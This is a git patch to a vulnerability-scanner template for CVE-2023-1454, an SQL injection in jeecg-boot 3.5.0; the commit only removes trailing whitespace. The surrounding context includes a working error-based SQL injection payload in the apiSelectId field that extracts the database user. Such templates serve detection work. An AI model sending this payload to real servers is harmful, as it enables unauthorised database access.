From 1e85ca79d8ddc30c102e307734fee137cbea65cb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 20 Jun 2023 23:55:20 +0530 Subject: [PATCH] fix trail space --- http/cves/2023/CVE-2023-1454.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index 3a4fbc11d0..37b61ed283 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -5,7 +5,7 @@ info: author: DhiyaneshDK severity: critical description: | - A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely. + A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely. reference: - https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln/tree/master - https://nvd.nist.gov/vuln/detail/CVE-2023-1454 @@ -29,7 +29,6 @@ http: Content-Type: application/json;charset=UTF-8 {"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"} - matchers-condition: and matchers: